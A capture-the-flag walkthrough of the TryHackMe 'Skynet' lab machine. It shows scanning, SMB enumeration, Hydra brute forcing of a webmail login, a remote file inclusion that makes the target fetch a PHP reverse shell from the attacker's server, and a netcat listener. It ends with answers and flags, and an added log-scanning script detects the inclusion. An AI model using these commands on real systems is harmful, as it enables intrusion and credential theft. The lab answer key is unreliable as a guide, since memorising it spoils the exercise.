TryHackMe Skynet is a vulnerable Terminator-themed Linux machine created to test our penetration testing knowledge in network scanning, enumeration, attacking Samba shares, RFI attacks and privilege escalation.

TryHackMe SkyNet WriteUp

Start the Machine

Before anything else, we need to start the machine and wait about a minute before beginning the recon phase. Once the machine is up and running, it’s time to scan the box.

Scan the Target Machine

To scan our machine I will use Nmap with a few arguments to detect the service versions on all ports.

nmap -sV -sC -A -p- 10.10.131.16

Analyse Nmap Scan results

After running the Nmap scan I noticed a few open ports and four main services: SSH, Apache, Dovecot and Samba.

  • 22/tcp SSH
  • 80/tcp HTTP
  • 110/tcp POP3
  • 139/tcp NetBIOS Samba
  • 143/tcp IMAP
  • 445/tcp NetBIOS Samba

Investigate Port 80 Apache/2.4.18

Open your browser at your Skynet box IP and a dummy Skynet search engine appears.


I tried searching for something but nothing happened. Analyzing the HTML code, I couldn’t find anything relevant!


At this point we have nothing from the webserver, so it’s time to search for folders and find something useful to explore.

Execute gobuster

To find new folders on the webserver I will use gobuster with a public list.

gobuster dir -u http://10.10.131.16 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50

After running gobuster we get some useful folders to investigate, but only one can be opened: the squirrelmail folder!

Info to Explore

  • folder squirrelmail

Investigate Dovecot

Open the browser and access the squirrelmail folder. It opens a login page and shows us the SquirrelMail version, 1.4.23.

http://10.10.131.16/squirrelmail

At this point we have the version of the SquirrelMail service and a login page, but no clue about any username or email. I tried some basic SQLi without success. It’s time to try the next available service, Samba.

Investigate Samba

To investigate the Samba service I usually use the SMBMap tool or Nmap.

smbmap -H 10.10.131.16

After executing smbmap we get some juicy info: we can read the anonymous share, and there is an interesting share named milesdyson, but we don’t have access to it.

Wait, milesdyson sounds like a username to me; maybe it can be used on the SquirrelMail login page. Keep it in mind. For now I will investigate the anonymous share, where I may find some useful files.

Connect to anonymous Share

For now let’s connect to the anonymous share with SMBClient using the command:

smbclient //10.10.131.16/anonymous

We are in. Let’s list the available files and search…


We have one file and one folder to investigate.

cat attention.txt

This confirms our suspicion: the user Miles Dyson exists.


The log1.txt file looks like a password list and may be usable as a wordlist to brute force the SquirrelMail login page. Let’s try it.

Brute force Squirrel login with Hydra

Here we will test milesdyson as the username and the log1.txt file as the wordlist.

hydra -l milesdyson -P log1.txt 10.10.131.16 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Something is incorrect." -V -F -u

After a successful brute force attack against SquirrelMail we can log in with user milesdyson and password cyborg007haloterminator

Squirrel Dashboard

Open the first email and extract the Samba password


Connect to milesdyson Share

smbclient //10.10.131.16/milesdyson -U milesdyson

Enter the password: )s{A&2Z=F^n_E.B`

There are only PDF files and a folder called notes. Let’s list it.

One file looks interesting: important.txt


The important.txt file mentions a new directory, /45kra24zxs28v3yd. Open it and we have the Miles Dyson homepage.


Use gobuster to find the administrator page

gobuster dir -u http://10.10.131.16/45kra24zxs28v3yd -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50
Open http://10.10.131.16/45kra24zxs28v3yd/administrator

Cuppa CMS Exploit

Find a useful exploit to run against Cuppa CMS

searchsploit cuppa

Select Reverse Shell

Here I will copy the PHP reverse shell into my home folder and then start a Python webserver to

cp /usr/share/webshells/php/php-reverse-shell.php ~

Change the webshell values IP and Port if needed.

cd /home/user
python3 -m http.server 801
http://10.10.131.16/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.153.122:801/php-reverse-shell.php

Open a new terminal and use netcat or Metasploit to listen on port 1234

nc -l 1234
cd milesdyson
cat user.txt
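
Seen from the defending side, the urlConfig request above stands out in the web server's access log because a query parameter carries a full URL. The following is an added example, not part of the original write-up: a small Python scanner for Apache combined-format logs. The sample lines, the /cms/ path and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" format: src ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# Parameter value that starts with a URL scheme or a PHP stream wrapper.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?|php|data|expect):', re.I)

def decode(value, rounds=3):
    """Percent-decode until stable so nested encodings are compared in clear."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_remote_includes(lines):
    """Flag requests to .php scripts whose query carries a URL-valued parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line this parser understands
        url = urlsplit(m["target"])
        if not url.path.lower().endswith(".php"):
            continue
        for name, raw in parse_qsl(url.query, keep_blank_values=True):
            value = decode(raw)  # parse_qsl has already decoded once
            if REMOTE_RE.match(value):
                findings.append({"src": m["src"], "time": m["ts"],
                                 "path": url.path, "param": name,
                                 "value": value, "status": int(m["status"])})
    return findings

# Constructed sample data: documentation-range addresses, placeholder path.
_P = "/cms/administrator/alerts/alertConfigField.php"
def _line(n, target):
    return (f'198.51.100.7 - - [10/Oct/2020:13:55:{n:02d} +0000] '
            f'"GET {target} HTTP/1.1" 200 512 "-" "-"')
SAMPLE_LOG = [
    _line(1, "/squirrelmail/src/login.php"),
    _line(2, _P + "?urlConfig=components/fields/config.php"),
    _line(3, _P + "?urlConfig=http://192.0.2.10:801/remote.php"),
    _line(4, _P + "?urlConfig=http%3A%2F%2F192.0.2.10%2Fremote.php"),
]
if __name__ == "__main__":
    for f in find_remote_includes(SAMPLE_LOG):
        print(f["time"], f["src"], f["path"], f["param"], "->", f["value"])
```

PHP only fetches http:// targets in include() when allow_url_include is enabled, so a hit from this scanner is also a prompt to check that setting on the host.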

Our session is limited to www-data, the user the webserver runs as. We need to find a way to elevate privileges, but before that let’s brute force the Samba share milesdyson.

Brute Force Samba Service

hydra -l milesdyson -P log1.txt 10.10.131.16 smb -V

No success brute forcing the milesdyson share. OK, let’s be more intrusive.

Privilege Escalation

Using Exploit

Search for an exploit for our kernel version

searchsploit kernel 4.8.0

Using Crontab

Root Flag

cat /root/root.txt

Answer Questions

Now it’s time to answer the CTF questions

Skynet Questions

What is Miles password for his emails?

cyborg007haloterminator

What is the hidden directory?

/45kra24zxs28v3yd

What is the vulnerability called when you can include a remote file for malicious purposes?

remote file inclusion

What is the user flag?

7ce5c2109a40f958099283600a9aeXXX

What is the root flag?

3f0372db24753accc7179a282cd6aXXX

Linux Kernel 4.8.0 UDEV < 232 – Local Privilege Escalation
